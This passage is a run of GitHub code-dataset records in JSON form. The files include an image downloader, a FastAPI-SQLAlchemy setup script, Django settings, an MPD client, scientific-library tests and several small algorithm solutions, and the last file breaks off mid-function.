download(self, args: Namespace):\n\n self.args = args\n self.parser = ParserFactory.get_parser(args.url)\n\n if not self.parser:\n raise NotImplementedError(f\"No parser was found to download from {args.url}\")\n\n LOGGER.info(f\"Downloading images from {self.args.url}\")\n\n try:\n images = self.parser.get_images(self.args.url)\n images = self._filter_existent_images(images)\n download_images(images, self.args.folder)\n\n except NotAbleToDownloadException as e:\n LOGGER.error(e)\n\n LOGGER.info(\"The downloader is done!\")\n\n def _filter_existent_images(self, images: list) -> list:\n new_images = []\n\n for i in images:\n\n pattern_to_search = self.filename_pattern % i.post_id\n pattern_to_search = os.path.join(self.args.folder, pattern_to_search)\n LOGGER.debug(\"Pattern to search: %s\" % pattern_to_search)\n\n if not self.args.should_overwrite and len(glob.glob(pattern_to_search)) > 0:\n LOGGER.info(f\"Skipping post {i.post_id}, we already have its images...\")\n continue\n new_images.append(i)\n\n return new_images\n","repo_name":"CharlieCorner/pymage_downloader","sub_path":"downloaders/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"33608461466","text":"import re\nfrom pathlib import Path\n\nfrom setuptools import setup\n\nwith open(Path(\"fastapi_sqlalchemy\") / \"__init__.py\", encoding=\"utf-8\") as fh:\n version = re.search(r'__version__ = \"(.*?)\"', fh.read(), re.M).group(1)\n\nwith open(\"README.rst\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetup(\n name=\"FastAPI-SQLAlchemy\",\n version=version,\n url=\"https://github.com/mfreeborn/fastapi-sqlalchemy\",\n project_urls={\n \"Code\": \"https://github.com/mfreeborn/fastapi-sqlalchemy\",\n \"Issue tracker\": \"https://github.com/mfreeborn/fastapi-sqlalchemy/issues\",\n },\n license=\"MIT\",\n author=\"Michael Freeborn\",\n author_email=\"michaelfreeborn1@gmail.com\",\n description=\"Adds simple SQLAlchemy support to FastAPI\",\n long_description=long_description,\n packages=[\"fastapi_sqlalchemy\"],\n 
package_data={\"fastapi_sqlalchemy\": [\"py.typed\"]},\n zip_safe=False,\n python_requires=\">=3.7\",\n install_requires=[\"starlette>=0.12.9\", \"SQLAlchemy>=1.2\"],\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Environment :: Web Environment\",\n \"Framework :: AsyncIO\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3 :: Only\",\n \"Programming Language :: Python :: Implementation :: CPython\",\n \"Topic :: Internet :: WWW/HTTP :: HTTP Servers\",\n \"Topic :: Internet :: WWW/HTTP :: Dynamic Content\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n)\n","repo_name":"mfreeborn/fastapi-sqlalchemy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":548,"dataset":"github-code","pt":"82"} +{"seq_id":"4624362272","text":"class Solution(object):\n def replaceElements(self, arr):\n curMax = 0\n result = []\n for i in reversed(range(len(arr))):\n if i == len(arr) -1:\n curMax = arr[i]\n result = [-1]\n else:\n result = [curMax] + result\n if arr[i] > curMax:\n curMax = arr[i]\n \n return result","repo_name":"chinatip/problem-solving","sub_path":"leetCode/array/easy/replace-elements-with-greatest-element-on-right-side.py","file_name":"replace-elements-with-greatest-element-on-right-side.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"1384803345","text":"import sys\nfrom PyQt5.QtWidgets import QApplication\nfrom gui import ScraperApp \n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n window = ScraperApp()\n\n window.setStyleSheet(\"background-color: #F5F5F5;\")\n window.setFixedSize(400, 300) # Adjust the size as per your preference\n\n window.show()\n sys.exit(app.exec_())\n","repo_name":"MuLIAICHI/Car-Scraper","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"13620628891","text":"\"\"\"\n给定一副牌 判断是否和牌 (川麻基本牌型 没有风 不考虑七小对 十三幺等特殊牌型 考虑杠)\n输入点数按照升序排列\n\"\"\"\nfrom typing import List, Tuple\n\n\ndef check_one_type(cards: List[int]) -> Tuple[bool, int, int]:\n length = len(cards)\n if length == 0:\n return True, 0, 0\n if length == 1:\n return False, -1, -1\n if length == 2:\n if cards[0] == cards[-1]:\n return True, 1, 0\n else:\n return False, -1, -1\n if length == 3:\n if cards[0] == cards[-1] or (cards[0] + 1 == cards[1] and cards[1] + 1 == cards[2]):\n return True, 0, 1\n else:\n return False, 0, 0\n if length == 4:\n if cards[0] == cards[-1]:\n return True, 0, 1\n else:\n return False, 0, 0\n for i in [2, 3, 4]:\n status, jiang_nums, shunzi_nums = check_one_type(cards[:i])\n if status:\n rest_status, rest_jiang, rest_shunzi = check_one_type(cards[i:])\n if rest_status:\n return True, jiang_nums + rest_jiang, shunzi_nums + rest_shunzi\n return False, -1, -1\n\n\ndef has_win(bings: List[int], tiaos: List[int], wans: List[int]):\n jiang_nums = 0\n shunzi_nums = 0\n for cards in [bings, tiaos, wans]:\n status, sub_jiang, sub_shunzi = check_one_type(cards)\n if not status:\n return False\n jiang_nums += sub_jiang\n shunzi_nums += sub_shunzi\n return 
jiang_nums == 1 and shunzi_nums == 4\n\n\nif __name__ == '__main__':\n    bings = []\n    wans = [1, 1, 1, 1, 2, 3, 4, 5, 6]\n    tiaos = [4, 5, 6, 7, 7]\n    print(has_win(bings, tiaos, wans))","repo_name":"ustczyb/py-leetcode","sub_path":"custom/mah-jong_1.py","file_name":"mah-jong_1.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"3116248916","text":"\"\"\"Tests for 2d flow around a cylinder with shifted boundary method on a 3D mesh\"\"\"\nfrom builtins import range\nfrom builtins import object\nfrom proteus.iproteus import *\nfrom proteus import Comm, defaults\nfrom proteus import Context\nimport tables\nimport importlib\n\n\ncomm = Comm.get()\nProfiling.logLevel = 7\nProfiling.verbose = False\nimport numpy as np\n\nmodulepath = os.path.dirname(os.path.abspath(__file__))\n\nclass Test_sbm_cylinder2D_on_mesh3D(object):\n\n    @classmethod\n    def setup_class(cls):\n        cls._scriptdir = os.path.dirname(os.path.abspath(__file__))\n    @classmethod\n    def teardown_class(cls):\n        pass\n\n    def setup_method(self, method):\n        pass\n\n    def teardown_method(self, method):\n        \"\"\" Tear down function \"\"\"\n        FileList = ['cylinder_sbm_mesh3D_T001_P1_sbm_3Dmesh.h5', 'cylinder_sbm_mesh3D_T001_P1_sbm_3Dmesh.xmf',\n                    ]\n        for file in FileList:\n            if os.path.isfile(file):\n                os.remove(file)\n            else:\n                pass\n\n\n\n    def test_ex1(self):\n        self.compare_name = \"T001_P1_sbm_3Dmesh\"\n        self.example_setting(\"T=0.01 spaceOrder=1 onlySaveFinalSolution=True\")\n        self.teardown_method(self)\n\n    # really slow\n#    def test_ex2(self):\n#        self.compare_name = \"T001_P2_sbm_3Dmesh\"\n#        self.example_setting(\"T=0.01 spaceOrder=2 onlySaveFinalSolution=True\")\n\n\n    def example_setting(self, pre_setting):\n        Context.contextOptionsString = pre_setting\n\n        my_so = defaults.load_system(\"cylinder_so\",modulepath)\n\n        opts.profile = False\n        opts.gatherArchive = True\n        \n        pList=[]\n        nList=[]\n        sList=[]\n        for (pModule,nModule) in my_so.pnList:\n            pList.append(defaults.load_physics(pModule,modulepath))\n            nList.append(defaults.load_numerics(nModule,modulepath))\n            if pList[-1].name == None:\n                pList[-1].name = pModule\n\n        if my_so.sList == []:\n            for i in range(len(my_so.pnList)):\n                s = default_s\n                sList.append(s)\n        else:\n            sList = my_so.sList\n\n        my_so.name += \"_sbm_mesh3D_\"+self.compare_name #save data with different filename\n        try:\n            ns = proteus.NumericalSolution.NS_base(my_so,\n                                                   pList,\n                                                   nList,\n                                                   sList,\n                                                   opts)\n        except:\n            assert 0, \"NS setup failed\"\n        try:\n            ns.calculateSolution(my_so.name)\n        except:\n            assert 0, \"NS calculation failed\"\n\n        actual = tables.open_file('cylinder_sbm_mesh3D_T001_P1_sbm_3Dmesh'+'.h5','r')\n        expected_path = 'comparison_files/' + 'comparison_u_t2.csv'\n        #write comparison file\n        #np.array(actual.root.u_t2).tofile(os.path.join(self._scriptdir, expected_path),sep=\",\")\n        np.testing.assert_almost_equal(np.fromfile(os.path.join(self._scriptdir, expected_path),sep=\",\"),np.array(actual.root.u_t2),decimal=10)\n\n        actual.close()\n","repo_name":"erdc/proteus","sub_path":"proteus/tests/cylinder2D/sbm_3Dmesh/test_cylinder2D_on_3D_mesh_sbm.py","file_name":"test_cylinder2D_on_3D_mesh_sbm.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"82"}
{"seq_id":"18245796145","text":"from typing import List, Dict\n\n\nclass TreeStore:\n\n    def __init__(self, items: List[Dict]):\n        _items = {}  # For direct access by id\n        _nodes = {}  # For storing a node's child elements\n\n        # Create the root node\n        root_item = items[0]\n        _nodes[root_item['id']] = []\n        _items[root_item['id']] = root_item\n\n        for item in items[1:]:\n            _nodes[item['id']] = []\n            _nodes[item['parent']].append(item['id'])\n            _items[item['id']] = item\n\n        self._nodes = _nodes\n        self._items = _items\n\n    def getAll(self) -> List[Dict]:\n        # Only the item list is traversed, O(n) complexity; we could simply have kept the original list, but that was probably not the intent\n        return list(self._items.values())\n\n    def getItem(self, item_id) -> Dict:\n        # Direct lookup, O(1) complexity\n        return self._items[item_id]\n\n    def getChildren(self, item_id: int) -> List:\n        # O(n) complexity; we could store the items themselves in the nodes, which would give O(1) at the cost of memory\n        return [self._items[i] for i in self._nodes[item_id]]\n\n    def getAllParents(self, item_id: int) -> List:\n        # Complexity O(n + 1), where n is the number of parent nodes\n        item = self._items[item_id]\n        if item['parent'] == 'root':\n            return []\n        parent_id = item['parent']\n        return [self._items[parent_id]] + self.getAllParents(parent_id)\n\nexample_items = [\n    {\"id\": 1, \"parent\": \"root\"},\n    {\"id\": 2, \"parent\": 1, \"type\": \"test\"},\n    {\"id\": 3, \"parent\": 1, \"type\": \"test\"},\n    {\"id\": 4, \"parent\": 2, \"type\": \"test\"},\n    {\"id\": 5, \"parent\": 2, \"type\": \"test\"},\n    {\"id\": 6, \"parent\": 2, \"type\": \"test\"},\n    {\"id\": 7, \"parent\": 4, \"type\": None},\n    {\"id\": 8, \"parent\": 4, \"type\": None},\n]\nts = TreeStore(example_items)\n\n# Usage examples:\nprint(ts.getAll() == example_items)\n\nprint(ts.getItem(7) == {\"id\": 7, \"parent\": 4, \"type\": None})\n#\nprint(ts.getChildren(4) == [{\"id\": 7, \"parent\": 4, \"type\": None},\n                            {\"id\": 8, \"parent\": 4, \"type\": None}])\nprint(ts.getChildren(5) == [])\n#\nprint(ts.getAllParents(7) == [{\"id\": 4, \"parent\": 2, \"type\": \"test\"},\n                              {\"id\": 2, \"parent\": 1, \"type\": \"test\"},\n                              {\"id\": 1, \"parent\": \"root\"}])\n","repo_name":"nurdermind/test_work_nodes","sub_path":"three_store.py","file_name":"three_store.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"}
{"seq_id":"32438418977","text":"# -*- coding: utf-8 -*-\n#\n# Authors: Alexandre Gramfort \n#          Eric Larson \n#          Joan Massich \n#          Guillaume Favelier \n#          Oleh Kozynets \n#\n# License: Simplified BSD\n\nimport pytest\nimport numpy as np\nimport os.path as path\nfrom mne import read_source_estimate\nfrom mne.datasets import testing\nfrom mne.viz._brain import _Brain\nfrom mne.viz._brain.colormap import calculate_lut\n\nfrom matplotlib import cm\n\ndata_path = testing.data_path(download=False)\nsubject_id = 'sample'\nsubjects_dir = path.join(data_path, 'subjects')\nfname_stc = path.join(data_path, 'MEG/sample/sample_audvis_trunc-meg')\nfname_label = path.join(data_path, 'MEG/sample/labels/Vis-lh.label')\nsurf = 'inflated'\n\n\n@testing.requires_testing_data\ndef test_brain_init(renderer):\n    \"\"\"Test initialization of the _Brain instance.\"\"\"\n    hemi = 'both'\n\n    with pytest.raises(ValueError, match='size'):\n        _Brain(subject_id=subject_id, hemi=hemi, surf=surf, size=0.5)\n    with pytest.raises(TypeError, match='figure'):\n        _Brain(subject_id=subject_id, hemi=hemi, surf=surf, figure='foo')\n    with pytest.raises(ValueError, match='interaction'):\n        _Brain(subject_id=subject_id, hemi=hemi, surf=surf, interaction=0)\n    with pytest.raises(KeyError):\n        _Brain(subject_id=subject_id, hemi='foo', 
surf=surf)\n\n _Brain(subject_id, hemi, surf, size=(300, 300),\n subjects_dir=subjects_dir)\n\n\n@testing.requires_testing_data\ndef test_brain_screenshot(renderer):\n \"\"\"Test screenshot of a _Brain instance.\"\"\"\n brain = _Brain(subject_id, hemi='both', size=600,\n surf=surf, subjects_dir=subjects_dir)\n img = brain.screenshot(mode='rgb')\n assert(img.shape == (600, 600, 3))\n\n\n@testing.requires_testing_data\ndef test_brain_add_data(renderer):\n \"\"\"Test adding data in _Brain instance.\"\"\"\n stc = read_source_estimate(fname_stc)\n\n hemi = 'lh'\n hemi_data = stc.data[:len(stc.vertices[0]), 10]\n hemi_vertices = stc.vertices[0]\n fmin = stc.data.min()\n fmax = stc.data.max()\n\n brain_data = _Brain(subject_id, hemi, surf, size=300,\n subjects_dir=subjects_dir)\n\n with pytest.raises(ValueError, match='thresh'):\n brain_data.add_data(hemi_data, thresh=-1)\n with pytest.raises(ValueError, match='remove_existing'):\n brain_data.add_data(hemi_data, remove_existing=-1)\n with pytest.raises(ValueError, match='time_label_size'):\n brain_data.add_data(hemi_data, time_label_size=-1)\n with pytest.raises(ValueError, match='scale_factor'):\n brain_data.add_data(hemi_data, scale_factor=-1)\n with pytest.raises(ValueError, match='vector_alpha'):\n brain_data.add_data(hemi_data, vector_alpha=-1)\n with pytest.raises(ValueError):\n brain_data.add_data(array=np.array([0, 1, 2]))\n with pytest.raises(ValueError):\n brain_data.add_data(hemi_data, fmin=fmin, hemi=hemi,\n fmax=fmax, vertices=None)\n\n brain_data.add_data(hemi_data, fmin=fmin, hemi=hemi, fmax=fmax,\n colormap='hot', vertices=hemi_vertices,\n colorbar=False, time=None)\n brain_data.add_data(hemi_data, fmin=fmin, hemi=hemi, fmax=fmax,\n colormap='hot', vertices=hemi_vertices,\n initial_time=0., colorbar=True, time=None)\n\n\n@testing.requires_testing_data\ndef test_brain_add_label(renderer):\n \"\"\"Test adding data in _Brain instance.\"\"\"\n from mne.label import read_label\n brain = _Brain(subject_id, hemi='lh', size=500,\n surf=surf, subjects_dir=subjects_dir)\n label = read_label(fname_label)\n brain.add_label(fname_label)\n brain.add_label(label)\n\n\n@testing.requires_testing_data\ndef test_brain_add_foci(renderer):\n \"\"\"Test adding foci in _Brain instance.\"\"\"\n brain = _Brain(subject_id, hemi='lh', size=500,\n surf=surf, subjects_dir=subjects_dir)\n brain.add_foci([0], coords_as_verts=True,\n hemi='lh', color='blue')\n\n\n@testing.requires_testing_data\ndef test_brain_add_text(renderer):\n \"\"\"Test adding text in _Brain instance.\"\"\"\n brain = _Brain(subject_id, hemi='lh', size=250,\n surf=surf, subjects_dir=subjects_dir)\n brain.add_text(x=0, y=0, text='foo')\n\n\ndef test_brain_colormap():\n \"\"\"Test brain's colormap functions.\"\"\"\n colormap = \"coolwarm\"\n alpha = 1.0\n fmin = 0.0\n fmid = 0.5\n fmax = 1.0\n center = None\n calculate_lut(colormap, alpha=alpha, fmin=fmin,\n fmid=fmid, fmax=fmax, center=center)\n center = 0.0\n colormap = cm.get_cmap(colormap)\n calculate_lut(colormap, alpha=alpha, fmin=fmin,\n fmid=fmid, fmax=fmax, center=center)\n","repo_name":"mpoziomska/MNE","sub_path":"mne/viz/_brain/tests/test_brain.py","file_name":"test_brain.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"4763360126","text":"'''\nj - i != nums[j] - nums[i]\n\nnums[j] - j != nums[i] - i\n[4,1,3,3]\n[0,1,2,3]\n\n[4,0,1,0]\n\n'''\nclass Solution:\n def countBadPairs(self, nums: List[int]) -> int:\n # O(n) / O(n)\n 
nums2 = [num - i for i, num in enumerate(nums)]\n \n dic = defaultdict(int)\n for i, num in enumerate(nums2):\n dic[num] += 1\n \n res = len(nums) * (len(nums) - 1) // 2\n for val, cnt in dic.items():\n res -= cnt * (cnt - 1) // 2\n \n return res","repo_name":"KOPFYF/LCEveryday","sub_path":"Hash Table & Prefix Sum/countBadPairs2364.py","file_name":"countBadPairs2364.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"75048007627","text":"\"\"\"\nDjango settings for hebrew_order_david project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\nAUTH_USER_MODEL = 'accounts.User'\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.environ.get('SECRET_KEY', str(os.urandom(32)))\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = bool(os.environ.get('DEBUG', True))\n\nTEMPLATE_DEBUG = bool(os.environ.get('DEBUG', True))\n\nALLOWED_HOSTS = ['*']\n\n\n# Application definition\n\nINSTALLED_APPS = (\n 'django_admin_bootstrapped',\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'application',\n 'bootstrap3',\n 'accounts',\n 'core',\n 'djangoformsetjs'\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'hebrew_order_david.urls'\n\nWSGI_APPLICATION = 'hebrew_order_david.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'hebrew_order_david',\n 'HOST': 'localhost',\n 'USER': 'postgres',\n 'PASSWORD': '',\n 'PORT': '5432'\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'America/Chicago'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nSTATIC_URL = '/static/'\n\nDAB_FIELD_RENDERER = 'django_admin_bootstrapped.renderers.BootstrapFieldRenderer'\n\nfrom django.contrib import messages\n\nMESSAGE_TAGS = {\n messages.SUCCESS: 'alert-success success',\n messages.WARNING: 'alert-warning warning',\n messages.ERROR: 'alert-danger error'\n}\n\nTEMPLATE_DIRS = (os.path.join(os.path.split(BASE_DIR)[0], 'core', 'templates'),)\n\n# email credentials\nEMAIL_FROM = os.environ.get('EMAIL_FROM', 'test@test.com')\nEMAIL_HOST_USER = os.environ.get('EMAIL_HOST_USER', None)\nEMAIL_HOST_PASSWORD = os.environ.get('EMAIL_HOST_PASSWORD', None)\nEMAIL_HOST = 
os.environ.get('EMAIL_HOST', None)\n\n# for testing in development\nif not EMAIL_HOST:\n EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n\n# for heroku deployment\nif os.environ.get('DATABASE_URL'):\n\n # Parse database configuration from $DATABASE_URL\n import dj_database_url\n DATABASES['default'] = dj_database_url.config()\n\n # Honor the 'X-Forwarded-Proto' header for request.is_secure()\n SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\n\n STATIC_ROOT = 'staticfiles'\n\n STATICFILES_DIRS = (\n os.path.join(BASE_DIR, 'static'),\n )\n","repo_name":"dhosterman/hebrew_order_david","sub_path":"hebrew_order_david/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"40265474315","text":"import socket\nimport re\nimport json\nimport functools\n\ndef asjson(f):\n\t\"\"\"Decorator: convert result to JSON.\"\"\"\n\t@functools.wraps(f)\n\tdef wrapped(*args, **kwargs):\n\t\treturn json.dumps(f(*args, **kwargs))\n\treturn wrapped\n\ndef statusasjson(f):\n\t\"\"\"Decorator: discard result, return status() as JSON instead.\"\"\"\n\t@functools.wraps(f)\n\tdef wrapped(*args, **kwargs):\n\t\tf(*args, **kwargs)\n\t\treturn json.dumps(status())\n\treturn wrapped\n\nclass MPC:\n\tdef __init__(self, host = \"localhost\", port = 6600):\n\t\t\"\"\"Initialize connection.\"\"\"\n\t\tself.__sock = socket.create_connection( (host, port), None )\n\t\tself.__file = self.__sock.makefile()\n\t\t\n\t\tself.__completionRE = re.compile(\"^(OK|ACK)\")\n\t\tself.__initRE = re.compile(\"^OK MPD ([0-9.]+)$\")\n\t\tself.__errorRE = re.compile(\"^ACK \\[(\\d*)@(\\d*)\\] {([^}]*)} (.*)$\")\n\t\tself.__assignmentRE = re.compile(\"^(.*?):\\s*(.*)$\")\n\t\tself.__version = None\n\t\t\n\t\t# read init sequence\n\t\tline = self.read()\n\t\tm = self.__initRE.match(line)\n\t\tif m != None:\n\t\t\tself.__version = m.group(1)\n\n\tdef send(self, cmd):\n\t\t\"\"\"Send a command to server.\"\"\"\n\t\tself.__file.write(cmd + \"\\n\")\n\t\tself.__file.flush()\t\n\t\n\tdef read(self):\n\t\t\"\"\"Read one line from server.\"\"\"\n\t\twhile True:\n\t\t\tres = self.__file.readline().strip()\n\t\t\tif len(res) > 0: \n\t\t\t\treturn res\n\t\n\tdef dumpResult(self, cmd):\n\t\t\"\"\"Execute command and dump full output.\"\"\"\n\t\tself.send(cmd)\n\t\twhile True:\n\t\t\tline = self.read()\n\t\t\tprint(\"> \" + line)\n\t\t\tif self.__completionRE.match(line) != None:\n\t\t\t\tbreak\n\t\n\tdef returnStatus(self, line, res, rest):\n\t\t\"\"\"Parse last line and return actual result tuple.\"\"\"\n\t\tif line == \"OK\":\n\t\t\treturn (\"OK\", res, rest)\n\t\t\t\n\t\tm = self.__errorRE.match(line)\n\t\tif m != None:\n\t\t\treturn (\"ERROR\", {\"error\": m.group(1), \"atcmd\": m.group(2), \"cmd\": m.group(3), \"msg\": m.group(4)})\n\t\t\n\t\treturn (\"UNKOWN\", res, rest)\n\t\n\tdef readSingleReply(self):\n\t\t\"\"\"Read a reply with a single assignment.\"\"\"\n\t\tres = {}\n\t\trest = []\n\t\t\n\t\twhile True:\n\t\t\tline = self.read()\n\t\t\tif self.__completionRE.match(line) != None:\n\t\t\t\treturn self.returnStatus(line, res, rest)\n\n\t\t\tm = self.__assignmentRE.match(line)\n\t\t\tif m != None:\t\t\t\tres[m.group(1)] = m.group(2)\n\t\t\telse:\n\t\t\t\trest.append(line)\n\t\n\tdef readListReply(self, newKeys = []):\n\t\t\"\"\"Read a reply with a list of assignments. 
newKeys should be a list of keys that may start a new item.\"\"\"\n\t\tres = []\n\t\trest = []\n\t\tcur = {}\n\t\t\n\t\twhile True:\n\t\t\tline = self.read()\n\t\t\tif self.__completionRE.match(line) != None:\n\t\t\t\tres.append(cur)\n\t\t\t\treturn self.returnStatus(line, res, rest)\n\n\t\t\tm = self.__assignmentRE.match(line)\n\t\t\tif m != None:\n\t\t\t\tif m.group(1) in newKeys:\n\t\t\t\t\tif cur != {}:\n\t\t\t\t\t\tres.append(cur)\n\t\t\t\t\tcur = {}\n\t\t\t\tcur[m.group(1)] = m.group(2)\n\t\t\telse:\n\t\t\t\trest.append(line)\n\t\t\n\t\n__mpc = None\nlastStatus = None\n__newKeys = {\n\t\"listplaylistinfo\": [\"file\"],\n\t\"lsinfo\": [\"directory\", \"file\", \"playlist\"],\n\t\"playlistinfo\": [\"file\"],\n\t\"search\": [\"file\"],\n}\n\ndef init(host = \"localhost\", port = 6600):\n\t\"\"\"Initialize singleton mpc instance.\"\"\"\n\tglobal __mpc\n\t__mpc = MPC(host, port)\n\ndef genericSingle(cmd, args = []):\n\t\"\"\"Handle all commands that return a single or no assignment.\"\"\"\n\t__mpc.send(cmd + \" \" + \" \".join(map(lambda x: '\"' + str(x) + '\"', args)))\n\treturn __mpc.readSingleReply()\n\ndef genericList(cmd, args = [], newKeys = None):\n\t\"\"\"Handle all commands that return a list of assignments.\"\"\"\n\tif newKeys == None:\n\t\tif cmd in __newKeys:\n\t\t\tnewKeys = __newKeys[cmd]\n\t\telse:\n\t\t\tnewKeys = []\n\t\n\t__mpc.send(cmd + \" \" + \" \".join(map(lambda x: '\"' + str(x) + '\"', args)))\n\treturn __mpc.readListReply(newKeys)\n\ndef status():\n\t\"\"\"Return current status. Combines results of status and currentsong and updates lastStatus variable.\"\"\"\n\tres = {\n\t\t\"status\": genericSingle(\"status\")[1],\n\t\t\"song\": genericSingle(\"currentsong\")[1],\n\t}\n\tglobal lastStatus\n\tlastStatus = res\n\treturn res\n\nif __name__ == \"__main__\":\n\tinit()\n\tprint(genericSingle(\"status\"))\n\t","repo_name":"nafur/flmpc","sub_path":"pympc.py","file_name":"pympc.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"}
{"seq_id":"69807218188","text":"import pytest\nfrom pycompete.features.transformers import RemoveCorrelated\nimport numpy as np\n\n\n@pytest.mark.parametrize(\n    \"X, X_expected, max_correlation\",\n    [\n        (\n            np.array([[0, 0.1, 0.04], [0.4, 0.45, -1], [0.78, 0.81, 2]]),\n            np.array([[0, 0.04], [0.4, -1], [0.78, 2]]),\n            0.95,\n        ),\n        (\n            np.array([[0, 0.1, 0.04], [0.4, 0.45, -1], [0.78, 0.81, 2]]),\n            np.array([[0, 0.1, 0.04], [0.4, 0.45, -1], [0.78, 0.81, 2]]),\n            1,\n        ),\n    ],\n)\ndef test_remove_correlated(X, X_expected, max_correlation):\n    rc = RemoveCorrelated(max_correlation=max_correlation)\n    rc.fit(X)\n    X_transformed = rc.transform(X)\n    assert np.allclose(X_transformed, X_expected, rtol=1e-05)\n","repo_name":"FChmiel/pycompete","sub_path":"tests/unit/features/test_transformers.py","file_name":"test_transformers.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"82"}
{"seq_id":"15864059382","text":"# ------*------ coding: utf-8 ------*------\n# @Time : 2023/4/11 18:54\n# @Author : 冰糖雪狸 (NekoSilverfox)\n# @Project : CUC\n# @File : dataset.py\n# @Software: PyCharm\n# @Github :https://github.com/NekoSilverFox\n# -----------------------------------------\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\nfrom numpy import pi\n\n\nRANDOM_STATE = 90102\n\n\ndef test_data_1():\n    # Build the dataset (normally distributed)\n    x_1_1 = pd.Series(np.random.normal(loc=28, scale=3, size=100), name='x1')\n    x_1_2 = pd.Series(np.random.normal(loc=25, scale=3, size=100), name='x2')\n    y_1 = pd.Series(['blue'] * 100, name='target')\n\n    x_2_1 = pd.Series(np.random.normal(loc=8, scale=3, size=100), name='x1')\n    x_2_2 = pd.Series(np.random.normal(loc=12, scale=3, size=100), name='x2')\n    y_2 = pd.Series(['red'] * 100, name='target')\n\n    plt.figure(figsize=(5, 5), dpi=100)\n    plt.scatter(x_1_1, x_1_2, s=5, c='blue')\n    plt.scatter(x_2_1, x_2_2, s=5, c='red')\n    plt.show()\n\n    tmp_data_1 = pd.concat([x_1_1, x_1_2, y_1], axis=1)\n    tmp_data_2 = pd.concat([x_2_1, x_2_2, y_2], axis=1)\n    data = pd.concat([tmp_data_1, tmp_data_2], axis=0)\n    # data = shuffle(data).reset_index(drop=True) # shuffle the sample order\n\n    plt.figure(figsize=(5, 5))\n    plt.scatter(x=data[data['target'] == 'red'].iloc[:, 0], y=data[data['target'] == 'red'].iloc[:, 1], s=5, c='red')\n    plt.scatter(x=data[data['target'] == 'blue'].iloc[:, 0], y=data[data['target'] == 'blue'].iloc[:, 1], s=5,\n                c='blue')\n    plt.show()\n\n    # Split the dataset\n    return train_test_split(data.iloc[:, :-1], data.iloc[:, -1])\n\n\ndef test_data_a():\n    data_train = pd.read_csv(filepath_or_buffer='./test_data/svmdata_a.txt', sep='\\t')\n    data_test = pd.read_csv(filepath_or_buffer='./test_data/svmdata_a_test.txt', sep='\\t')\n    data = pd.concat([data_train, data_test], axis=0)\n    # data = shuffle(data).reset_index(drop=True)\n\n    